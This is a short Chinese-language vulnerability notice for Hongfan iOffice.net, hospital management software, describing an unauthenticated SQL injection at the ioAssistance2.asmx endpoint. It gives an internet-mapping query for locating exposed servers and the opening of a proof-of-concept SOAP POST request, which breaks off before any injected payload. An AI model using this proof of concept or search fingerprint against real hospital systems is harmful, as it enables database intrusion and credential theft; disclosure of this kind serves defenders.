产品简介
红帆iOffice.net从最早满足医院行政办公需求(传统 OA),到目前融合了卫生主管部门的管理规范和众多行业特色应用,是目前唯一定位于解决医院综合业务管理的软件,是最符合医院行业特点的医院综合业务管理平台,是成功案例最多的医院综合业务管理软件。
漏洞概述
红帆iOffice.net、ioassistance2.asmx接囗处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
网络测绘
app = “红帆-ioffice”
漏洞POC
POST /ioffice/prg/set/wss/ioAssistance2.asmx HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 373
Content-Type: text/xml; charset=utf-8
Soapaction: "http://tempuri.org/GetLoginedEmpNoReadedInf"
Accept-Encoding: gzip, deflate
<?xml version="1.0" encoding="utf